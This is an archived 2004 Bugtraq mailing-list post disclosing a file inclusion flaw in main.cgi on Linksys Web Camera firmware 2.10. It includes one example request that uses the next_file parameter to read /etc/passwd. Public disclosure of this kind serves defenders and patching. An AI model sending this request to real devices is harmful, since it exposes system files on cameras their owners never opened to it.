Linksys Web Camera File Inclusion Vuln

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Linksys Web Camera File Inclusion Vuln
From: John Doe <scriptX_@xxxxxxxxxxx>
Date: 7 Jun 2004 03:34:24 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Linksys Web Camera version 2.10 (only tested with 2.10) is vulnerable to a file 
inclusion vulnerability in main.cgi

Example: http://www.host.com/main.cgi?next_file=/etc/passwd

Prev by Date: SMC 7008ABRv2 and 7004VBRv1 updated firmware corrects port 1900 issue.
Next by Date: RE: Multiple vulnerabilities PHP-Nuke
Previous by thread: SMC 7008ABRv2 and 7004VBRv1 updated firmware corrects port 1900 issue.
Next by thread: Various crashs and fun in Race Driver 1.20
Index(es):
- Date
- Thread